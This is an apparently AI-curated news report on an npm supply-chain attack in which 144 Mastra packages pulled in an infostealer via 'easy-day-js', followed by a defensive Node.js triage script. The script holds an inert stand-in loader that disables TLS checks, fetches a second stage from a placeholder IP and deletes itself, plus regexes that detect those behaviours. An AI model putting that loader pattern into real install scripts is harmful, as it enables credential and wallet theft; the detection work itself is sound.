In a nutshell: manipulated versions of 144 npm packages of the Mastra framework pull in an infostealer that exfiltrates wallet and browser data at install time; the heavily used core package is among those affected.
An attacker has published manipulated versions of 144 npm packages of the open-source AI framework Mastra, among them the core package with more than 918,000 weekly downloads. The malware steals wallet and browser data as soon as the package is installed, before any of it is executed by application code.
Security companies JFrog, SafeDep, Socket and StepSecurity identified the supply chain attack, tracked as "easy-day-js", on 17 June 2026. The attacker took over the npm account of former maintainer ehindero and, within a short window, published 144 manipulated packages in the Mastra namespace. Mastra is a JavaScript and TypeScript framework for building AI applications. The manipulated packages contain no malicious code themselves; instead they declare a dependency on the malicious package "easy-day-js", which poses as a clone of a common date library and is therefore pulled in transitively by every install.
The infection is triggered at install time by an install lifecycle script. The script first disables TLS certificate validation, then downloads a second malware stage from an external IP address. The loader then deletes itself, leaving minimal forensic traces. The final payload is a cross-platform infostealer for Windows, macOS and Linux: it harvests browser history and saved login credentials, targets more than 160 crypto-wallet browser extensions, and transmits the collected data to the attackers.
For CTOs, the scope matters: the core package alone is downloaded more than 918,000 times a week. A system is compromised at install time, before a developer ever imports the package in code, so running the install step on a project that resolved a manipulated version is sufficient; no code that uses the package has to execute. The npm registry has already removed the affected versions.
The compromised account ehindero published with a personal access token that carried no provenance attestation, whereas regular Mastra releases are produced by automated pipelines that attach cryptographic signatures. Installations that enforce signature verification (for example a CI step such as `npm audit signatures`, which reports packages whose registry signature or provenance attestation is missing or invalid) would have rejected the manipulated versions. Security researchers recommend that affected developers immediately move to clean versions, rotate credentials (the browser-saved logins and wallet secrets the malware targets in particular) and check systems for traces of infection.
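As an added example that is not code from the article, the security vendors or the Mastra project: an offline triage script in Node.js that applies the two practical points of the paragraphs above, namely that the malicious dependency arrives transitively through a manipulated parent package, and that it acts through an install-time script that disables TLS validation, fetches a second stage from a bare IP address and deletes itself. It scans a lockfile for the malicious package and for whichever package declared it, then pattern-matches install lifecycle hooks for those three behaviours. The lockfile, package.json, version strings, the stand-in script text and the IP address (203.0.113.10, from the TEST-NET documentation range) are all constructed assumptions; only the package name easy-day-js comes from the article.

```javascript
'use strict';

// Added example, not code from the article or from the Mastra project.
// Assumptions: package-lock.json v3 layout; the malicious dependency name
// "easy-day-js" comes from the article; versions, file contents and the
// IP address (TEST-NET range) are constructed for illustration only.

// Constructed lockfile fragment for a hypothetical app that resolved a
// manipulated @mastra/core, which in turn declares easy-day-js.
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', dependencies: { '@mastra/core': '0.0.0-example' } },
    'node_modules/@mastra/core': {
      version: '0.0.0-example',
      dependencies: { 'easy-day-js': '0.0.0-example' },
    },
    'node_modules/easy-day-js': { version: '0.0.0-example', hasInstallScript: true },
    'node_modules/dayjs': { version: '1.11.0' }, // benign look-alike, must not match
  },
};

const KNOWN_BAD = new Set(['easy-day-js']);

// "node_modules/a/node_modules/b" -> "b"; also handles scoped names like "@s/p".
function nameFromKey(key) {
  const marker = 'node_modules/';
  const idx = key.lastIndexOf(marker);
  return idx === -1 ? key : key.slice(idx + marker.length);
}

// Every installed copy of a known-bad package, plus every package that declares
// it. The parent is what the developer actually installed, i.e. the manipulated
// package, because the bad dependency only ever arrives transitively.
function findBadDependencies(lock, badNames = KNOWN_BAD) {
  const hits = [];
  const parents = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (badNames.has(nameFromKey(key))) {
      hits.push({ path: key, version: entry.version, hasInstallScript: Boolean(entry.hasInstallScript) });
    }
    for (const dep of Object.keys(entry.dependencies || {})) {
      if (badNames.has(dep)) parents.push(key === '' ? '(root)' : nameFromKey(key));
    }
  }
  return { hits, parents };
}

// Lifecycle hooks npm runs automatically during installation.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics for the three behaviours the article attributes to the loader:
// TLS validation switched off, a second stage fetched from a bare IP address,
// and the loader deleting its own file.
const INDICATORS = [
  { id: 'tls-disabled', re: /NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['"]?0|rejectUnauthorized\s*:\s*false/ },
  { id: 'raw-ip-download', re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\// },
  { id: 'self-delete', re: /\b(?:unlinkSync|unlink|rmSync)\s*\(\s*(?:__filename|process\.argv\[1\])/ },
];

// Inspect a package's install hooks. readScript(path) returns a file's text or
// undefined; "node <file>" commands are resolved to that file, anything else is
// scanned as the literal command string. Nothing is executed.
function auditInstallScripts(pkgJson, readScript) {
  const findings = [];
  const hooks = pkgJson.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = hooks[hook];
    if (!cmd) continue;
    const m = cmd.match(/^node\s+(\S+)/);
    const body = m ? (readScript(m[1]) || '') : cmd;
    const indicators = INDICATORS.filter((i) => i.re.test(body)).map((i) => i.id);
    findings.push({ hook, command: cmd, indicators });
  }
  return findings;
}

// Constructed package.json and an inert stand-in for a suspicious loader. The
// text is only pattern-matched, never run, and is not the real malware.
const SAMPLE_PKG = {
  name: 'easy-day-js',
  version: '0.0.0-example',
  scripts: { postinstall: 'node setup.js', prepare: 'node build.js' },
};
const SAMPLE_FILES = {
  'setup.js': [
    "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';",
    "require('https').get('https://203.0.113.10/stage2', () => {});",
    "require('fs').unlinkSync(__filename);",
  ].join('\n'),
  'build.js': "console.log('building');", // benign hook, must produce no indicators
};

// Combined triage verdict for a project: known-bad packages, the parents that
// pulled them in, and install hooks matching the loader's behaviour.
function triage(lock = SAMPLE_LOCK, pkgJson = SAMPLE_PKG, files = SAMPLE_FILES) {
  const deps = findBadDependencies(lock);
  const audited = auditInstallScripts(pkgJson, (p) => files[p]);
  const suspicious = audited.filter((f) => f.indicators.length > 0);
  return {
    compromised: deps.hits.length > 0 || suspicious.length > 0,
    badPackages: deps.hits,
    manipulatedParents: deps.parents,
    suspiciousHooks: suspicious,
  };
}

console.log(JSON.stringify(triage(), null, 2));
```

Run it with node against the embedded samples; for a real project, pass the parsed package-lock.json as lock and a readScript that reads files from the suspect package's directory. Two preventive settings follow from the analysis above: `ignore-scripts=true` in .npmrc stops npm from running install hooks at all (packages that genuinely need them must then be handled explicitly), and `npm audit signatures` reports packages whose registry signature or provenance attestation is missing or invalid, which is the enforcement the article says would have rejected the manipulated versions.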
Source: www.it-daily.net · Published 18 June 2026
Lumi AI News — AI-assisted curation pursuant to Article 50 EU AI Act. Paraphrase and classification via Lumi News Pipeline v1.7.1.